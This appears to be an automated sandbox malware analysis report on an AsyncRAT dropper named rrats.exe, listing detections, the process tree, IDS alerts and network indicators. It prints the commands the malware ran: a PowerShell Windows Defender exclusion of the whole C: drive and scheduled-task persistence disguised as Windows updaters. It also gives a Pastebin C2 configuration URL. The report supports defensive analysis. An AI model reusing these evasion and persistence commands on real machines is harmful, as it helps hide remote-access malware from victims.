
Windows Analysis Report
rrats.exe

Overview

General Information

Sample name: rrats.exe
Analysis ID: 1571504
MD5: a2bdb024c98b7e8d3d06fc86e110d204
SHA1: 2442360d37bf7e60b0d20c447bf5a0b51635a1d4
SHA256: 72cd6d490f03122c90b4a52c8bc7fb5b938123eaf4926b5cc5cee14f44bef3cf
Tags: exe, user-lontze7

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Sigma detected: Cmd.EXE Missing Space Characters Execution Anomaly
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rrats.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\rrats.exe" MD5: A2BDB024C98B7E8D3D06FC86E110D204)
    • cmd.exe (PID: 3812 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • a.exe (PID: 1372 cmdline: a.exe -p1234 MD5: 7107F3FB53F9F3EAF3B95FD857F7AEE9)
        • rrat.exe (PID: 1968 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" MD5: 3D91C31A52BE4E262F7F18272294ED99)
          • cmd.exe (PID: 5712 cmdline: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2180 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 7212 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7292 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7324 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • Explorer.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Roaming\Explorer.exe" MD5: 3D91C31A52BE4E262F7F18272294ED99)
  • Explorer.exe (PID: 7356 cmdline: C:\Users\user\AppData\Roaming\Explorer.exe MD5: 3D91C31A52BE4E262F7F18272294ED99)
    • cmd.exe (PID: 7492 cmdline: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7588 cmdline: schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7512 cmdline: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7596 cmdline: schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" MD5: 48C2FE20575769DE916F48EF0676A965)
  • explore.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\explore.exe MD5: 3D91C31A52BE4E262F7F18272294ED99)
  • cmd.exe (PID: 7652 cmdline: cmd.exe /C powershell Add-MpPreference -ExclusionPath C:" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: powershell Add-MpPreference -ExclusionPath C:" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it could also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Blogpost URLs: (empty)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
{"Mutex": "RRAT_nMo7Zfs0N", "Certificate": "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", "Server Signature": "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", "External_config_on_Pastebin": "http://pastebin.com/raw/hbwHfEg3"}
Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\explore.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\Users\user\AppData\Local\explore.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\explore.exe | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0xe765:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
(4 further entries not shown)

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.4490902100.0000000002B05000.00000004.00000800.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x3cce:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0x12cd1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
(14 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
5.0.rrat.exe.200000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
5.0.rrat.exe.200000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
5.0.rrat.exe.200000.0.unpack | INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse | Detects file containing reversed ASEP Autorun registry keys | ditekSHen
  • 0xe765:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
5.2.rrat.exe.26db1a0.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
5.2.rrat.exe.26db1a0.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
(3 further entries not shown)

                        System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe", CommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\Explorer.exe, ParentProcessId: 7356, ParentProcessName: Explorer.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe", ProcessId: 7492, ProcessName: cmd.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ProcessId: 1968, TargetFilename: C:\Users\user\AppData\Roaming\Explorer.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ParentProcessId: 1968, ParentProcessName: rrat.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, ProcessId: 7212, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, ParentProcessId: 1968, ParentProcessName: rrat.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 5712, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Roaming\Explorer.exe, CommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\Explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, ProcessId: 7356, ProcessName: Explorer.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7212, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' , ProcessId: 7292, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5712, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 2180, ProcessName: powershell.exe
Source: Process started | Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative | Data: Command: "C:\Users\user\AppData\Roaming\Explorer.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Explorer.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Explorer.exe, NewProcessName: C:\Users\user\AppData\Roaming\Explorer.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Explorer.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7228, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Explorer.exe" , ProcessId: 7412, ProcessName: Explorer.exe

                        Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" , CommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" , CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Explorer.exe, ParentImage: C:\Users\user\AppData\Roaming\Explorer.exe, ParentProcessId: 7356, ParentProcessName: Explorer.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" , ProcessId: 7512, ProcessName: cmd.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T14:12:40.786601+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49760 | 172.67.19.24 | 80 | TCP
2024-12-09T14:12:53.020544+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49795 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:02.207565+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49819 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:08.614808+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49836 | 172.67.19.24 | 80 | TCP
2024-12-09T14:13:11.467632+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49844 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:20.624120+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49869 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:29.787528+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49894 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:36.117241+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49911 | 172.67.19.24 | 80 | TCP
2024-12-09T14:13:38.962820+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49919 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:48.479837+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49942 | 172.67.19.24 | 443 | TCP
2024-12-09T14:13:54.927268+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49959 | 172.67.19.24 | 80 | TCP
2024-12-09T14:13:57.774564+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49968 | 172.67.19.24 | 443 | TCP
2024-12-09T14:14:06.899015+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49994 | 172.67.19.24 | 443 | TCP
2024-12-09T14:14:13.630369+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50010 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:20.317839+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50021 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:26.523182+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50023 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:34.583291+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50026 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:41.130094+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50028 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:47.676907+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50030 | 172.67.19.24 | 80 | TCP
2024-12-09T14:14:54.442475+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50033 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:01.185178+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50036 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:07.864248+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50039 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:22.618944+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50047 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:37.637427+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50053 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:38.178561+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50053 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:44.362516+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50054 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:44.785853+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50054 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:51.334402+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50056 | 172.67.19.24 | 80 | TCP
2024-12-09T14:15:57.863773+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 50057 | 172.67.19.24 | 80 | TCP

                        AV Detection

Source: rrats.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\explore.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Avira: detection malicious, Label: TR/Dropper.Gen
                        Source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpMalware Configuration Extractor: AsyncRAT {"Mutex": "RRAT_nMo7Zfs0N", "Certificate": "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", "Server Signature": "ZAEVYE4+WDbUbphyNWIlYDNiT/0G1m9oCuNRmqApkPq6DK43FO9IDy0E8zAIsJqQGMPgP1NzlXR2kcsyXklHOExDxYS3BgDNGipVUm+7oBSM9xIUV90aAwMlMzGtD/d5LKJ50z3PIis8Nj9WXzSPSL1/AbQ9Lq13L9V7jdRZiDkVQb2sLWoUErXM4eM0zmtCIpvRbO6yvBr/zUh3mKmOtugjkXGwE7CMEWCCB4fnfJm4tKYpDle+WxRa/ZfioEFdHTi9ZgzDLBvOWbQZWJMVvrlkXNZ7ENh/Ugpd+1rggG0z06CRTxmnEULOb+ej2kTU57iWbicoZRsme2t5XSwWmnD6OTmX1/mlgn9YnRFiqiL1GZlkNhXSuLUMELD7FV3L7xO86rjZLt8dX+BrHCZCzFF+3yzI7IEnpIf5Lmr+Q29LgsdB+ZUeCIBGnJ8GinuDNlijxi9AWzYj3Nmukgv2ltukS1k8021CWQu6TRKJXURqrECPkCwdt4z8i3A/3ojdz9AwFyK4tXUop7fkL++8lwinbMBXgxDLcXd/y+nmv34okEGRYMH5VUz1v6QIrfHhyYHSiQ7NqQ5953KaE+u9FN0JXCtZxmd2WiW/aoYw3ob7HIexuk0ytURxvG52YyVfdMuzhqe9QDc8U4MkkkOO4eQK2F/5q/iG99dyHrKwVek=", "External_config_on_Pastebin": "http://pastebin.com/raw/hbwHfEg3"}
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\explore.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\Explorer.exe | ReversingLabs: Detection: 81%
Source: rrats.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\explore.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Joe Sandbox ML: detected
Source: rrats.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50038 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50058 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: rrats.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rrats.exe
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: rrats.exe, 00000000.00000003.2025471553.0000000007875000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000004.00000000.2030069537.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe, 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe.0.dr
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CCB348 FindFirstFileExA,0_2_00CCB348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E82AF9 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_00E82AF9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E91260 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_00E91260
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E9FCC8 FindFirstFileExA,4_2_00E9FCC8

                        Networking

Source: C:\Users\user\AppData\Roaming\Explorer.exe | Network Connect: 104.20.4.235 443
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Network Connect: 172.67.19.24 443
Source: C:\Users\user\AppData\Roaming\Explorer.exe | Network Connect: 194.67.204.7 88
Source: unknown | DNS query: name: pastebin.com
Source: Yara match | File source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
